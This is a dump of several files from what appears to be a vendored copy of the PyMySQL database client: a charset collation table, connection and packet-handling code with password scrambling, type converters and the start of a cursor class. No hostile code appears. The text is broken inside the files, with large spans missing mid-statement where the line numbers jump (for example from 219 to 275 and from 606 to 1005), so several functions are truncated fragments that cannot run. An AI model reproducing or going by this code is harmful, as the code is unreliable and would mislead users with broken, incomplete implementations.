'ucs2_romanian_ci', '')) 174 | _charsets.add(Charset(132, 'ucs2', 'ucs2_slovenian_ci', '')) 175 | _charsets.add(Charset(133, 'ucs2', 'ucs2_polish_ci', '')) 176 | _charsets.add(Charset(134, 'ucs2', 'ucs2_estonian_ci', '')) 177 | _charsets.add(Charset(135, 'ucs2', 'ucs2_spanish_ci', '')) 178 | _charsets.add(Charset(136, 'ucs2', 'ucs2_swedish_ci', '')) 179 | _charsets.add(Charset(137, 'ucs2', 'ucs2_turkish_ci', '')) 180 | _charsets.add(Charset(138, 'ucs2', 'ucs2_czech_ci', '')) 181 | _charsets.add(Charset(139, 'ucs2', 'ucs2_danish_ci', '')) 182 | _charsets.add(Charset(140, 'ucs2', 'ucs2_lithuanian_ci', '')) 183 | _charsets.add(Charset(141, 'ucs2', 'ucs2_slovak_ci', '')) 184 | _charsets.add(Charset(142, 'ucs2', 'ucs2_spanish2_ci', '')) 185 | _charsets.add(Charset(143, 'ucs2', 'ucs2_roman_ci', '')) 186 | _charsets.add(Charset(144, 'ucs2', 'ucs2_persian_ci', '')) 187 | _charsets.add(Charset(145, 'ucs2', 'ucs2_esperanto_ci', '')) 188 | _charsets.add(Charset(146, 'ucs2', 'ucs2_hungarian_ci', '')) 189 | _charsets.add(Charset(147, 'ucs2', 'ucs2_sinhala_ci', '')) 190 | _charsets.add(Charset(159, 'ucs2', 'ucs2_general_mysql500_ci', '')) 191 | _charsets.add(Charset(160, 'utf32', 'utf32_unicode_ci', '')) 192 | _charsets.add(Charset(161, 'utf32', 'utf32_icelandic_ci', '')) 193 | _charsets.add(Charset(162, 'utf32', 'utf32_latvian_ci', '')) 194 | _charsets.add(Charset(163, 'utf32', 'utf32_romanian_ci', '')) 195 | _charsets.add(Charset(164, 'utf32', 'utf32_slovenian_ci', '')) 196 | _charsets.add(Charset(165, 'utf32', 'utf32_polish_ci', '')) 197 | _charsets.add(Charset(166, 'utf32', 'utf32_estonian_ci', '')) 198 | _charsets.add(Charset(167, 'utf32', 'utf32_spanish_ci', '')) 199 | _charsets.add(Charset(168, 'utf32', 'utf32_swedish_ci', '')) 200 | _charsets.add(Charset(169, 'utf32', 'utf32_turkish_ci', '')) 201 | _charsets.add(Charset(170, 'utf32', 'utf32_czech_ci', '')) 202 | _charsets.add(Charset(171, 'utf32', 'utf32_danish_ci', '')) 203 | _charsets.add(Charset(172, 'utf32', 'utf32_lithuanian_ci', '')) 204 | _charsets.add(Charset(173, 'utf32', 'utf32_slovak_ci', '')) 205 | _charsets.add(Charset(174, 'utf32', 'utf32_spanish2_ci', '')) 206 | _charsets.add(Charset(175, 'utf32', 'utf32_roman_ci', '')) 207 | _charsets.add(Charset(176, 'utf32', 'utf32_persian_ci', '')) 208 | _charsets.add(Charset(177, 'utf32', 'utf32_esperanto_ci', '')) 209 | _charsets.add(Charset(178, 'utf32', 'utf32_hungarian_ci', '')) 210 | _charsets.add(Charset(179, 'utf32', 'utf32_sinhala_ci', '')) 211 | _charsets.add(Charset(192, 'utf8', 'utf8_unicode_ci', '')) 212 | _charsets.add(Charset(193, 'utf8', 'utf8_icelandic_ci', '')) 213 | _charsets.add(Charset(194, 'utf8', 'utf8_latvian_ci', '')) 214 | _charsets.add(Charset(195, 'utf8', 'utf8_romanian_ci', '')) 215 | _charsets.add(Charset(196, 'utf8', 'utf8_slovenian_ci', '')) 216 | _charsets.add(Charset(197, 'utf8', 'utf8_polish_ci', '')) 217 | _charsets.add(Charset(198, 'utf8', 'utf8_estonian_ci', '')) 218 | _charsets.add(Charset(199, 'utf8', 'utf8_spanish_ci', '')) 219 | _charsets.add(Charset(200, 'utf8', 'utf8_swedish_ci', '')) 220 | _charsets.add(Charset(201, 'utf8', 'utf8_turkish_ci', '')) 221 | _charsets.add(Charset(202, 'utf8', 'utf8_czech_ci', '')) 222 | _charsets.add(Charset(203, 'utf8', 'utf8_danish_ci', '')) 223 | _charsets.add(Charset(204, 'utf8', 'utf8_lithuanian_ci', '')) 224 | _charsets.add(Charset(205, 'utf8', 'utf8_slovak_ci', '')) 225 | _charsets.add(Charset(206, 'utf8', 'utf8_spanish2_ci', '')) 226 | _charsets.add(Charset(207, 'utf8', 'utf8_roman_ci', '')) 227 | _charsets.add(Charset(208, 'utf8', 'utf8_persian_ci', '')) 228 | _charsets.add(Charset(209, 'utf8', 'utf8_esperanto_ci', '')) 229 | _charsets.add(Charset(210, 'utf8', 'utf8_hungarian_ci', '')) 230 | _charsets.add(Charset(211, 'utf8', 'utf8_sinhala_ci', '')) 231 | _charsets.add(Charset(223, 'utf8', 'utf8_general_mysql500_ci', '')) 232 | _charsets.add(Charset(224, 'utf8mb4', 'utf8mb4_unicode_ci', '')) 233 | _charsets.add(Charset(225, 'utf8mb4', 'utf8mb4_icelandic_ci', '')) 234 | _charsets.add(Charset(226, 'utf8mb4', 'utf8mb4_latvian_ci', '')) 235 | _charsets.add(Charset(227, 'utf8mb4', 'utf8mb4_romanian_ci', '')) 236 | _charsets.add(Charset(228, 'utf8mb4', 'utf8mb4_slovenian_ci', '')) 237 | _charsets.add(Charset(229, 'utf8mb4', 'utf8mb4_polish_ci', '')) 238 | _charsets.add(Charset(230, 'utf8mb4', 'utf8mb4_estonian_ci', '')) 239 | _charsets.add(Charset(231, 'utf8mb4', 'utf8mb4_spanish_ci', '')) 240 | _charsets.add(Charset(232, 'utf8mb4', 'utf8mb4_swedish_ci', '')) 241 | _charsets.add(Charset(233, 'utf8mb4', 'utf8mb4_turkish_ci', '')) 242 | _charsets.add(Charset(234, 'utf8mb4', 'utf8mb4_czech_ci', '')) 243 | _charsets.add(Charset(235, 'utf8mb4', 'utf8mb4_danish_ci', '')) 244 | _charsets.add(Charset(236, 'utf8mb4', 'utf8mb4_lithuanian_ci', '')) 245 | _charsets.add(Charset(237, 'utf8mb4', 'utf8mb4_slovak_ci', '')) 246 | _charsets.add(Charset(238, 'utf8mb4', 'utf8mb4_spanish2_ci', '')) 247 | _charsets.add(Charset(239, 'utf8mb4', 'utf8mb4_roman_ci', '')) 248 | _charsets.add(Charset(240, 'utf8mb4', 'utf8mb4_persian_ci', '')) 249 | _charsets.add(Charset(241, 'utf8mb4', 'utf8mb4_esperanto_ci', '')) 250 | _charsets.add(Charset(242, 'utf8mb4', 'utf8mb4_hungarian_ci', '')) 251 | _charsets.add(Charset(243, 'utf8mb4', 'utf8mb4_sinhala_ci', '')) 252 | 253 | 254 | charset_by_name = _charsets.by_name 255 | charset_by_id = _charsets.by_id 256 | 257 | 258 | def charset_to_encoding(name): 259 | """Convert MySQL's charset name to Python's codec name""" 260 | if name == 'utf8mb4': 261 | return 'utf8' 262 | return name 263 | -------------------------------------------------------------------------------- /databases/pymysql/connections.py: -------------------------------------------------------------------------------- 1 | # Python implementation of the MySQL client-server protocol 2 | # http://dev.mysql.com/doc/internals/en/client-server-protocol.html 3 | 4 | from __future__ import print_function 5 | from _compat import PY2, range_type, text_type, str_type, JYTHON, IRONPYTHON 6 | 7 | import errno 8 | from functools import partial 9 | import os 10 | import hashlib 11 | import socket 12 | 13 | try: 14 | import ssl 15 | SSL_ENABLED = True 16 | except ImportError: 17 | SSL_ENABLED = False 18 | 19 | import struct 20 | import sys 21 | if PY2: 22 | import ConfigParser as configparser 23 | else: 24 | import configparser 25 | 26 | import io 27 | 28 | try: 29 | import getpass 30 | DEFAULT_USER = getpass.getuser() 31 | except ImportError: 32 | DEFAULT_USER = None 33 | 34 | 35 | from charset import MBLENGTH, charset_by_name, charset_by_id 36 | from cursors import Cursor 37 | from constants import FIELD_TYPE 38 | from constants import SERVER_STATUS 39 | from constants.CLIENT import * 40 | from constants.COMMAND import * 41 | from util import byte2int, int2byte 42 | from converters import escape_item, encoders, decoders, escape_string 43 | from err import ( 44 | raise_mysql_exception, Warning, Error, 45 | InterfaceError, DataError, DatabaseError, OperationalError, 46 | IntegrityError, InternalError, NotSupportedError, ProgrammingError) 47 | 48 | _py_version = sys.version_info[:2] 49 | 50 | 51 | # socket.makefile() in Python 2 is not usable because very inefficient and 52 | # bad behavior about timeout. 53 | # XXX: ._socketio doesn't work under IronPython. 54 | if _py_version == (2, 7) and not IRONPYTHON: 55 | # read method of file-like returned by sock.makefile() is very slow. 56 | # So we copy io-based one from Python 3. 57 | from _socketio import SocketIO 58 | def _makefile(sock, mode): 59 | return io.BufferedReader(SocketIO(sock, mode)) 60 | elif _py_version == (2, 6): 61 | # Python 2.6 doesn't have fast io module. 62 | # So we make original one. 63 | class SockFile(object): 64 | def __init__(self, sock): 65 | self._sock = sock 66 | def read(self, n): 67 | read = self._sock.recv(n) 68 | if len(read) == n: 69 | return read 70 | while True: 71 | data = self._sock.recv(n-len(read)) 72 | if not data: 73 | return read 74 | read += data 75 | if len(read) == n: 76 | return read 77 | 78 | def _makefile(sock, mode): 79 | assert mode == 'rb' 80 | return SockFile(sock) 81 | else: 82 | # socket.makefile in Python 3 is nice. 83 | def _makefile(sock, mode): 84 | return sock.makefile(mode) 85 | 86 | 87 | TEXT_TYPES = set([ 88 | FIELD_TYPE.BIT, 89 | FIELD_TYPE.BLOB, 90 | FIELD_TYPE.LONG_BLOB, 91 | FIELD_TYPE.MEDIUM_BLOB, 92 | FIELD_TYPE.STRING, 93 | FIELD_TYPE.TINY_BLOB, 94 | FIELD_TYPE.VAR_STRING, 95 | FIELD_TYPE.VARCHAR]) 96 | 97 | sha_new = partial(hashlib.new, 'sha1') 98 | 99 | DEBUG = False 100 | 101 | NULL_COLUMN = 251 102 | UNSIGNED_CHAR_COLUMN = 251 103 | UNSIGNED_SHORT_COLUMN = 252 104 | UNSIGNED_INT24_COLUMN = 253 105 | UNSIGNED_INT64_COLUMN = 254 106 | UNSIGNED_CHAR_LENGTH = 1 107 | UNSIGNED_SHORT_LENGTH = 2 108 | UNSIGNED_INT24_LENGTH = 3 109 | UNSIGNED_INT64_LENGTH = 8 110 | 111 | DEFAULT_CHARSET = 'latin1' 112 | 113 | MAX_PACKET_LEN = 2**24-1 114 | 115 | 116 | def dump_packet(data): 117 | 118 | def is_ascii(data): 119 | if 65 <= byte2int(data) <= 122: #data.isalnum(): 120 | if isinstance(data, int): 121 | return chr(data) 122 | return data 123 | return '.' 124 | 125 | try: 126 | print("packet length:", len(data)) 127 | print("method call[1]:", sys._getframe(1).f_code.co_name) 128 | print("method call[2]:", sys._getframe(2).f_code.co_name) 129 | print("method call[3]:", sys._getframe(3).f_code.co_name) 130 | print("method call[4]:", sys._getframe(4).f_code.co_name) 131 | print("method call[5]:", sys._getframe(5).f_code.co_name) 132 | print("-" * 88) 133 | except ValueError: 134 | pass 135 | dump_data = [data[i:i+16] for i in range_type(0, min(len(data), 256), 16)] 136 | for d in dump_data: 137 | print(' '.join(map(lambda x:"{:02X}".format(byte2int(x)), d)) + 138 | ' ' * (16 - len(d)) + ' ' * 2 + 139 | ' '.join(map(lambda x:"{}".format(is_ascii(x)), d))) 140 | print("-" * 88) 141 | print() 142 | 143 | 144 | def _scramble(password, message): 145 | if not password: 146 | return b'\0' 147 | if DEBUG: print('password=' + password) 148 | stage1 = sha_new(password).digest() 149 | stage2 = sha_new(stage1).digest() 150 | s = sha_new() 151 | s.update(message) 152 | s.update(stage2) 153 | result = s.digest() 154 | return _my_crypt(result, stage1) 155 | 156 | 157 | def _my_crypt(message1, message2): 158 | length = len(message1) 159 | result = struct.pack('B', length) 160 | for i in range_type(length): 161 | x = (struct.unpack('B', message1[i:i+1])[0] ^ 162 | struct.unpack('B', message2[i:i+1])[0]) 163 | result += struct.pack('B', x) 164 | return result 165 | 166 | # old_passwords support ported from libmysql/password.c 167 | SCRAMBLE_LENGTH_323 = 8 168 | 169 | 170 | class RandStruct_323(object): 171 | def __init__(self, seed1, seed2): 172 | self.max_value = 0x3FFFFFFF 173 | self.seed1 = seed1 % self.max_value 174 | self.seed2 = seed2 % self.max_value 175 | 176 | def my_rnd(self): 177 | self.seed1 = (self.seed1 * 3 + self.seed2) % self.max_value 178 | self.seed2 = (self.seed1 + self.seed2 + 33) % self.max_value 179 | return float(self.seed1) / float(self.max_value) 180 | 181 | 182 | def _scramble_323(password, message): 183 | hash_pass = _hash_password_323(password) 184 | hash_message = _hash_password_323(message[:SCRAMBLE_LENGTH_323]) 185 | hash_pass_n = struct.unpack(">LL", hash_pass) 186 | hash_message_n = struct.unpack(">LL", hash_message) 187 | 188 | rand_st = RandStruct_323(hash_pass_n[0] ^ hash_message_n[0], 189 | hash_pass_n[1] ^ hash_message_n[1]) 190 | outbuf = io.BytesIO() 191 | for _ in range_type(min(SCRAMBLE_LENGTH_323, len(message))): 192 | outbuf.write(int2byte(int(rand_st.my_rnd() * 31) + 64)) 193 | extra = int2byte(int(rand_st.my_rnd() * 31)) 194 | out = outbuf.getvalue() 195 | outbuf = io.BytesIO() 196 | for c in out: 197 | outbuf.write(int2byte(byte2int(c) ^ byte2int(extra))) 198 | return outbuf.getvalue() 199 | 200 | 201 | def _hash_password_323(password): 202 | nr = 1345345333 203 | add = 7 204 | nr2 = 0x12345671 205 | 206 | for c in [byte2int(x) for x in password if x not in (' ', '\t')]: 207 | nr^= (((nr & 63)+add)*c)+ (nr << 8) & 0xFFFFFFFF 208 | nr2= (nr2 + ((nr2 << 8) ^ nr)) & 0xFFFFFFFF 209 | add= (add + c) & 0xFFFFFFFF 210 | 211 | r1 = nr & ((1 << 31) - 1) # kill sign bits 212 | r2 = nr2 & ((1 << 31) - 1) 213 | 214 | # pack 215 | return struct.pack(">LL", r1, r2) 216 | 217 | 218 | def pack_int24(n): 219 | return struct.pack(' len(self._data): 275 | raise Exception('Invalid advance amount (%s) for cursor. ' 276 | 'Position=%s' % (length, new_position)) 277 | self._position = new_position 278 | 279 | def rewind(self, position=0): 280 | """Set the position of the data buffer cursor to 'position'.""" 281 | if position < 0 or position > len(self._data): 282 | raise Exception("Invalid position to rewind cursor to: %s." % position) 283 | self._position = position 284 | 285 | def get_bytes(self, position, length=1): 286 | """Get 'length' bytes starting at 'position'. 287 | 288 | Position is start of payload (first four packet header bytes are not 289 | included) starting at index '0'. 290 | 291 | No error checking is done. If requesting outside end of buffer 292 | an empty string (or string shorter than 'length') may be returned! 293 | """ 294 | return self._data[position:(position+length)] 295 | 296 | def read_length_encoded_integer(self): 297 | """Read a 'Length Coded Binary' number from the data buffer. 298 | 299 | Length coded numbers can be anywhere from 1 to 9 bytes depending 300 | on the value of the first byte. 301 | """ 302 | c = ord(self.read(1)) 303 | if c == NULL_COLUMN: 304 | return None 305 | if c < UNSIGNED_CHAR_COLUMN: 306 | return c 307 | elif c == UNSIGNED_SHORT_COLUMN: 308 | return unpack_uint16(self.read(UNSIGNED_SHORT_LENGTH)) 309 | elif c == UNSIGNED_INT24_COLUMN: 310 | return unpack_int24(self.read(UNSIGNED_INT24_LENGTH)) 311 | elif c == UNSIGNED_INT64_COLUMN: 312 | return unpack_int64(self.read(UNSIGNED_INT64_LENGTH)) 313 | 314 | def read_length_coded_string(self): 315 | """Read a 'Length Coded String' from the data buffer. 316 | 317 | A 'Length Coded String' consists first of a length coded 318 | (unsigned, positive) integer represented in 1-9 bytes followed by 319 | that many bytes of binary data. (For example "cat" would be "3cat".) 320 | """ 321 | length = self.read_length_encoded_integer() 322 | if length is None: 323 | return None 324 | return self.read(length) 325 | 326 | def is_ok_packet(self): 327 | return self._data[0:1] == b'\0' 328 | 329 | def is_eof_packet(self): 330 | # http://dev.mysql.com/doc/internals/en/generic-response-packets.html#packet-EOF_Packet 331 | # Caution: \xFE may be LengthEncodedInteger. 332 | # If \xFE is LengthEncodedInteger header, 8bytes followed. 333 | return len(self._data) < 9 and self._data[0:1] == b'\xfe' 334 | 335 | def is_resultset_packet(self): 336 | field_count = ord(self._data[0:1]) 337 | return 1 <= field_count <= 250 338 | 339 | def is_error_packet(self): 340 | return self._data[0:1] == b'\xff' 341 | 342 | def check_error(self): 343 | if self.is_error_packet(): 344 | self.rewind() 345 | self.advance(1) # field_count == error (we already know that) 346 | errno = unpack_uint16(self.read(2)) 347 | if DEBUG: print("errno =", errno) 348 | raise_mysql_exception(self._data) 349 | 350 | def dump(self): 351 | dump_packet(self._data) 352 | 353 | 354 | class FieldDescriptorPacket(MysqlPacket): 355 | """A MysqlPacket that represents a specific column's metadata in the result. 356 | 357 | Parsing is automatically done and the results are exported via public 358 | attributes on the class such as: db, table_name, name, length, type_code. 359 | """ 360 | 361 | def __init__(self, data, encoding): 362 | MysqlPacket.__init__(self, data, encoding) 363 | self.__parse_field_descriptor(encoding) 364 | 365 | def __parse_field_descriptor(self, encoding): 366 | """Parse the 'Field Descriptor' (Metadata) packet. 367 | 368 | This is compatible with MySQL 4.1+ (not compatible with MySQL 4.0). 369 | """ 370 | self.catalog = self.read_length_coded_string() 371 | self.db = self.read_length_coded_string() 372 | self.table_name = self.read_length_coded_string().decode(encoding) 373 | self.org_table = self.read_length_coded_string().decode(encoding) 374 | self.name = self.read_length_coded_string().decode(encoding) 375 | self.org_name = self.read_length_coded_string().decode(encoding) 376 | self.advance(1) # non-null filler 377 | self.charsetnr = struct.unpack(' 2: 509 | use_unicode = True 510 | 511 | if db is not None and database is None: 512 | database = db 513 | if passwd is not None and not password: 514 | password = passwd 515 | 516 | if compress or named_pipe: 517 | raise NotImplementedError("compress and named_pipe arguments are not supported") 518 | 519 | if ssl and ('capath' in ssl or 'cipher' in ssl): 520 | raise NotImplementedError('ssl options capath and cipher are not supported') 521 | 522 | self.ssl = False 523 | if ssl: 524 | if not SSL_ENABLED: 525 | raise NotImplementedError("ssl module not found") 526 | self.ssl = True 527 | client_flag |= SSL 528 | for k in ('key', 'cert', 'ca'): 529 | v = None 530 | if k in ssl: 531 | v = ssl[k] 532 | setattr(self, k, v) 533 | 534 | if read_default_group and not read_default_file: 535 | if sys.platform.startswith("win"): 536 | read_default_file = "c:\\my.ini" 537 | else: 538 | read_default_file = "/etc/my.cnf" 539 | 540 | if read_default_file: 541 | if not read_default_group: 542 | read_default_group = "client" 543 | 544 | cfg = configparser.RawConfigParser() 545 | cfg.read(os.path.expanduser(read_default_file)) 546 | 547 | def _config(key, default): 548 | try: 549 | return cfg.get(read_default_group, key) 550 | except Exception: 551 | return default 552 | 553 | user = _config("user", user) 554 | password = _config("password", password) 555 | host = _config("host", host) 556 | database = _config("database", database) 557 | unix_socket = _config("socket", unix_socket) 558 | port = int(_config("port", port)) 559 | charset = _config("default-character-set", charset) 560 | 561 | self.host = host 562 | self.port = port 563 | self.user = user or DEFAULT_USER 564 | self.password = password or "" 565 | self.db = database 566 | self.no_delay = no_delay 567 | self.unix_socket = unix_socket 568 | if charset: 569 | self.charset = charset 570 | self.use_unicode = True 571 | else: 572 | self.charset = DEFAULT_CHARSET 573 | self.use_unicode = False 574 | 575 | if use_unicode is not None: 576 | self.use_unicode = use_unicode 577 | 578 | self.encoding = charset_by_name(self.charset).encoding 579 | 580 | client_flag |= CAPABILITIES 581 | client_flag |= MULTI_STATEMENTS 582 | if self.db: 583 | client_flag |= CONNECT_WITH_DB 584 | self.client_flag = client_flag 585 | 586 | self.cursorclass = cursorclass 587 | self.connect_timeout = connect_timeout 588 | 589 | self._result = None 590 | self._affected_rows = 0 591 | self.host_info = "Not connected" 592 | 593 | #: specified autocommit mode. None means use server default. 594 | self.autocommit_mode = autocommit 595 | 596 | self.encoders = encoders # Need for MySQLdb compatibility. 597 | self.decoders = conv 598 | self.sql_mode = sql_mode 599 | self.init_command = init_command 600 | self._connect() 601 | 602 | def close(self): 603 | ''' Send the quit message and close the socket ''' 604 | if self.socket is None: 605 | raise Error("Already closed") 606 | send_data = struct.pack('= i + 6: 1005 | lang, stat, cap_h, salt_len = struct.unpack('= i + salt_len: 1021 | self.salt += data[i:i+salt_len] # salt_len includes auth_plugin_data_part_1 and filler 1022 | #TODO: AUTH PLUGIN NAME may appear here. 1023 | 1024 | def get_server_info(self): 1025 | return self.server_version 1026 | 1027 | Warning = Warning 1028 | Error = Error 1029 | InterfaceError = InterfaceError 1030 | DatabaseError = DatabaseError 1031 | DataError = DataError 1032 | OperationalError = OperationalError 1033 | IntegrityError = IntegrityError 1034 | InternalError = InternalError 1035 | ProgrammingError = ProgrammingError 1036 | NotSupportedError = NotSupportedError 1037 | 1038 | class Result(): 1039 | 1040 | def __init__(self,data): 1041 | self.data = data 1042 | self.index = 0 1043 | self.charset = DEFAULT_CHARSET 1044 | self.encoding = charset_by_name(self.charset).encoding 1045 | self.use_unicode = None 1046 | self.decoders = decoders 1047 | 1048 | def _read_packet(self, packet_type=MysqlPacket): 1049 | """Read an entire "mysql packet" in its entirety from the network 1050 | and return a MysqlPacket type that represents the results. 1051 | """ 1052 | buff = b'' 1053 | while True: 1054 | packet_header = self._read_bytes(4) 1055 | if DEBUG: dump_packet(packet_header) 1056 | packet_length_bin = packet_header[:3] 1057 | 1058 | #TODO: check sequence id 1059 | # packet_number 1060 | byte2int(packet_header[3]) 1061 | 1062 | bin_length = packet_length_bin + b'\0' # pad little-endian number 1063 | bytes_to_read = struct.unpack('>> datetime_or_None('2007-02-25 23:06:20') 102 | datetime.datetime(2007, 2, 25, 23, 6, 20) 103 | >>> datetime_or_None('2007-02-25T23:06:20') 104 | datetime.datetime(2007, 2, 25, 23, 6, 20) 105 | 106 | Illegal values are returned as None: 107 | 108 | >>> datetime_or_None('2007-02-31T23:06:20') is None 109 | True 110 | >>> datetime_or_None('0000-00-00 00:00:00') is None 111 | True 112 | 113 | """ 114 | if ' ' in obj: 115 | sep = ' ' 116 | elif 'T' in obj: 117 | sep = 'T' 118 | else: 119 | return convert_date(obj) 120 | 121 | try: 122 | ymd, hms = obj.split(sep, 1) 123 | usecs = '0' 124 | if '.' in hms: 125 | hms, usecs = hms.split('.') 126 | usecs = float('0.' + usecs) * 1e6 127 | return datetime.datetime(*[ int(x) for x in ymd.split('-')+hms.split(':')+[usecs] ]) 128 | except ValueError: 129 | return convert_date(obj) 130 | 131 | 132 | def convert_timedelta(obj): 133 | """Returns a TIME column as a timedelta object: 134 | 135 | >>> timedelta_or_None('25:06:17') 136 | datetime.timedelta(1, 3977) 137 | >>> timedelta_or_None('-25:06:17') 138 | datetime.timedelta(-2, 83177) 139 | 140 | Illegal values are returned as None: 141 | 142 | >>> timedelta_or_None('random crap') is None 143 | True 144 | 145 | Note that MySQL always returns TIME columns as (+|-)HH:MM:SS, but 146 | can accept values as (+|-)DD HH:MM:SS. The latter format will not 147 | be parsed correctly by this function. 148 | """ 149 | try: 150 | microseconds = 0 151 | if "." in obj: 152 | (obj, tail) = obj.split('.') 153 | microseconds = float('0.' + tail) * 1e6 154 | hours, minutes, seconds = obj.split(':') 155 | negate = 1 156 | if hours.startswith("-"): 157 | hours = hours[1:] 158 | negate = -1 159 | tdelta = datetime.timedelta( 160 | hours = int(hours), 161 | minutes = int(minutes), 162 | seconds = int(seconds), 163 | microseconds = int(microseconds) 164 | ) * negate 165 | return tdelta 166 | except ValueError: 167 | return None 168 | 169 | def convert_time(obj): 170 | """Returns a TIME column as a time object: 171 | 172 | >>> time_or_None('15:06:17') 173 | datetime.time(15, 6, 17) 174 | 175 | Illegal values are returned as None: 176 | 177 | >>> time_or_None('-25:06:17') is None 178 | True 179 | >>> time_or_None('random crap') is None 180 | True 181 | 182 | Note that MySQL always returns TIME columns as (+|-)HH:MM:SS, but 183 | can accept values as (+|-)DD HH:MM:SS. The latter format will not 184 | be parsed correctly by this function. 185 | 186 | Also note that MySQL's TIME column corresponds more closely to 187 | Python's timedelta and not time. However if you want TIME columns 188 | to be treated as time-of-day and not a time offset, then you can 189 | use set this function as the converter for FIELD_TYPE.TIME. 190 | """ 191 | try: 192 | microseconds = 0 193 | if "." in obj: 194 | (obj, tail) = obj.split('.') 195 | microseconds = float('0.' + tail) * 1e6 196 | hours, minutes, seconds = obj.split(':') 197 | return datetime.time(hour=int(hours), minute=int(minutes), 198 | second=int(seconds), microsecond=int(microseconds)) 199 | except ValueError: 200 | return None 201 | 202 | def convert_date(obj): 203 | """Returns a DATE column as a date object: 204 | 205 | >>> date_or_None('2007-02-26') 206 | datetime.date(2007, 2, 26) 207 | 208 | Illegal values are returned as None: 209 | 210 | >>> date_or_None('2007-02-31') is None 211 | True 212 | >>> date_or_None('0000-00-00') is None 213 | True 214 | 215 | """ 216 | try: 217 | return datetime.date(*[ int(x) for x in obj.split('-', 2) ]) 218 | except ValueError: 219 | return None 220 | 221 | 222 | def convert_mysql_timestamp(timestamp): 223 | """Convert a MySQL TIMESTAMP to a Timestamp object. 224 | 225 | MySQL >= 4.1 returns TIMESTAMP in the same format as DATETIME: 226 | 227 | >>> mysql_timestamp_converter('2007-02-25 22:32:17') 228 | datetime.datetime(2007, 2, 25, 22, 32, 17) 229 | 230 | MySQL < 4.1 uses a big string of numbers: 231 | 232 | >>> mysql_timestamp_converter('20070225223217') 233 | datetime.datetime(2007, 2, 25, 22, 32, 17) 234 | 235 | Illegal values are returned as None: 236 | 237 | >>> mysql_timestamp_converter('2007-02-31 22:32:17') is None 238 | True 239 | >>> mysql_timestamp_converter('00000000000000') is None 240 | True 241 | 242 | """ 243 | if timestamp[4] == '-': 244 | return convert_datetime(timestamp) 245 | timestamp += "0"*(14-len(timestamp)) # padding 246 | year, month, day, hour, minute, second = \ 247 | int(timestamp[:4]), int(timestamp[4:6]), int(timestamp[6:8]), \ 248 | int(timestamp[8:10]), int(timestamp[10:12]), int(timestamp[12:14]) 249 | try: 250 | return datetime.datetime(year, month, day, hour, minute, second) 251 | except ValueError: 252 | return None 253 | 254 | def convert_set(s): 255 | return set(s.split(",")) 256 | 257 | def convert_bit(b): 258 | #b = "\x00" * (8 - len(b)) + b # pad w/ zeroes 259 | #return struct.unpack(">Q", b)[0] 260 | # 261 | # the snippet above is right, but MySQLdb doesn't process bits, 262 | # so we shouldn't either 263 | return b 264 | 265 | def convert_characters(connection, field, data): 266 | field_charset = charset_by_id(field.charsetnr).name 267 | encoding = charset_to_encoding(field_charset) 268 | if field.flags & FLAG.SET: 269 | return convert_set(data.decode(encoding)) 270 | if field.flags & FLAG.BINARY: 271 | return data 272 | 273 | if connection.use_unicode: 274 | data = data.decode(encoding) 275 | elif connection.charset != field_charset: 276 | data = data.decode(encoding) 277 | data = data.encode(connection.encoding) 278 | return data 279 | 280 | encoders = { 281 | bool: escape_bool, 282 | int: escape_int, 283 | long_type: escape_int, 284 | float: escape_float, 285 | str: escape_str, 286 | text_type: escape_unicode, 287 | tuple: escape_sequence, 288 | list: escape_sequence, 289 | set: escape_sequence, 290 | dict: escape_dict, 291 | type(None): escape_None, 292 | datetime.date: escape_date, 293 | datetime.datetime: escape_datetime, 294 | datetime.timedelta: escape_timedelta, 295 | datetime.time: escape_time, 296 | time.struct_time: escape_struct_time, 297 | Decimal: str, 298 | } 299 | 300 | 301 | def through(x): 302 | return x 303 | 304 | if not PY2 or JYTHON or IRONPYTHON: 305 | encoders[bytes] = escape_bytes 306 | 307 | decoders = { 308 | FIELD_TYPE.BIT: convert_bit, 309 | FIELD_TYPE.TINY: int, 310 | FIELD_TYPE.SHORT: int, 311 | FIELD_TYPE.LONG: int, 312 | FIELD_TYPE.FLOAT: float, 313 | FIELD_TYPE.DOUBLE: float, 314 | FIELD_TYPE.DECIMAL: float, 315 | FIELD_TYPE.NEWDECIMAL: float, 316 | FIELD_TYPE.LONGLONG: int, 317 | FIELD_TYPE.INT24: int, 318 | FIELD_TYPE.YEAR: int, 319 | FIELD_TYPE.TIMESTAMP: convert_mysql_timestamp, 320 | FIELD_TYPE.DATETIME: convert_datetime, 321 | FIELD_TYPE.TIME: convert_timedelta, 322 | FIELD_TYPE.DATE: convert_date, 323 | FIELD_TYPE.SET: convert_set, 324 | FIELD_TYPE.BLOB: through, 325 | FIELD_TYPE.TINY_BLOB: through, 326 | FIELD_TYPE.MEDIUM_BLOB: through, 327 | FIELD_TYPE.LONG_BLOB: through, 328 | FIELD_TYPE.STRING: through, 329 | FIELD_TYPE.VAR_STRING: through, 330 | FIELD_TYPE.VARCHAR: through, 331 | FIELD_TYPE.DECIMAL: Decimal, 332 | FIELD_TYPE.NEWDECIMAL: Decimal, 333 | } 334 | 335 | 336 | # for MySQLdb compatibility 337 | conversions = decoders 338 | 339 | def Thing2Literal(obj): 340 | return escape_str(str(obj)) 341 | -------------------------------------------------------------------------------- /databases/pymysql/cursors.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | from __future__ import print_function, absolute_import 3 | import re 4 | 5 | from _compat import range_type, text_type, PY2 6 | 7 | from err import ( 8 | Warning, Error, InterfaceError, DataError, 9 | DatabaseError, OperationalError, IntegrityError, InternalError, 10 | NotSupportedError, ProgrammingError) 11 | 12 | 13 | #: Regular expression for :meth:`Cursor.executemany`. 14 | #: executemany only suports simple bulk insert. 15 | #: You can use it to load large dataset. 16 | RE_INSERT_VALUES = re.compile(r"""INSERT\s.+\sVALUES\s+(\(\s*%s\s*(,\s*%s\s*)*\))\s*\Z""", 17 | re.IGNORECASE | re.DOTALL) 18 | 19 | 20 | class Cursor(object): 21 | ''' 22 | This is the object you use to interact with the database. 23 | ''' 24 | 25 | #: Max stetement size which :meth:`executemany` generates. 26 | #: 27 | #: Max size of allowed statement is max_allowed_packet - packet_header_size. 28 | #: Default value of max_allowed_packet is 1048576. 29 | max_stmt_length = 1024000 30 | 31 | def __init__(self, connection): 32 | ''' 33 | Do not create an instance of a Cursor yourself. Call 34 | connections.Connection.cursor(). 35 | ''' 36 | self.connection = connection 37 | self.description = None 38 | self.rownumber = 0 39 | self.rowcount = -1 40 | self.arraysize = 1 41 | self._executed = None 42 | self._result = None 43 | self._rows = None 44 | 45 | def __del__(self): 46 | ''' 47 | When this gets GC'd close it. 48 | ''' 49 | self.close() 50 | 